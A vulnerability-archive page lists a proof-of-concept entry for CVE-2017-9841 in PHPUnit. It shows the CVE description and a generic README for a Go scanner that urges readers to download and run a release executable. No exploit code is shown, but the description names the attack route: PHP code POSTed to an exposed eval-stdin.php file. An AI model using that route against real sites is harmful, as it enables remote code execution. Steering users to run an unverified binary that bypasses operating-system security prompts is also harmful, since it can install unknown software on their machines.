Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2017-9841 PoC — PHPUnit 安全漏洞

Source
Associated Vulnerability
Title: PHPUnit 安全漏洞 (CVE-2017-9841)
Description:Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
Description
🛡️ Scan for vulnerable PHPUnit endpoints quickly with this fast, multithreaded tool, ensuring your applications stay secure against CVE-2017-9841.
Readme
# 🚀 PHPUnit-GoScan - Scan for Vulnerabilities with Ease

[![Download PHPUnit-GoScan](https://img.shields.io/badge/Download-PHPUnit--GoScan-brightgreen)](https://github.com/Habibullah1101/PHPUnit-GoScan/releases)

## 📘 Overview

PHPUnit-GoScan is a tool designed to help you scan for vulnerabilities easily. It focuses on CVE-2017-9841, targeting vulnerabilities in applications using PHPUnit. This application is built in Go, ensuring fast and efficient scanning.

## 🚀 Getting Started

Here’s how you can set up and start using PHPUnit-GoScan.

### 1. 🛠️ System Requirements

Before you dive in, make sure your system meets these minimum requirements:

- **Operating System**: Windows, macOS, or Linux
- **Memory**: At least 512 MB RAM
- **Disk Space**: At least 50 MB available
- **Network**: Internet connection for updates and further resources

### 2. 📥 Download & Install

To get the latest version, you can visit the Releases page. Here’s the [link to download PHPUnit-GoScan](https://github.com/Habibullah1101/PHPUnit-GoScan/releases). 

- Click on the link above to go to the Releases page.
- Look for the latest version listed.
- Find the installer suitable for your operating system.
- Download the file by clicking on it. 

### 3. ⚙️ Running PHPUnit-GoScan

Once you have downloaded the file, follow these steps to run the application:

- **Windows:**
  1. Locate the downloaded file in your Downloads folder.
  2. Double-click on the executable file.
  3. Follow the on-screen instructions to start the scanning process.

- **macOS:**
  1. Find the downloaded file in your Downloads folder.
  2. Double-click the file to open it.
  3. If prompted, allow the app to run in System Preferences > Security & Privacy > General.
  4. Follow the on-screen steps.

- **Linux:**
  1. Open the Terminal.
  2. Navigate to your Downloads folder using `cd ~/Downloads`.
  3. Run the file by typing `./PHPUnit-GoScan`.
  4. Follow the prompts in the terminal to complete the scan.

### 4. 🔍 Using PHPUnit-GoScan

After running the application, you’ll see a simple interface. You can enter the target URL you wish to scan. 

To start a scan:

1. Enter the URL of the application that uses PHPUnit.
2. Click the "Scan" button.
3. Wait for the results, which will display any vulnerabilities detected.

### 5. 📄 Understanding the Scan Results

Once the scan is complete, you will receive a report. This report will list:

- The vulnerabilities found
- The severity of each vulnerability
- Suggestions on how to fix the issues

It’s important to check each item, prioritize fixes based on severity, and take action accordingly.

### 6. 💬 Support and Updates

For any issues or questions, feel free to reach out through the Issues tab in this repository. Updates and new features will be posted here, so it’s a good idea to check back periodically.

### 7. 🌐 Additional Resources

For more insights and support, you might find the following resources helpful:

- [Official PHPUnit Documentation](https://phpunit.de/documentation.html)
- [Go Programming Language Documentation](https://golang.org/doc/)
- Community forums and Q&A sites like Stack Overflow.

### 8. ⭐ Contributing

We welcome contributions! If you have ideas for improvements or a feature request, please open an issue or submit a pull request in this repository.

Thank you for choosing PHPUnit-GoScan! Happy scanning!

[![Download PHPUnit-GoScan](https://img.shields.io/badge/Download-PHPUnit--GoScan-brightgreen)](https://github.com/Habibullah1101/PHPUnit-GoScan/releases)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →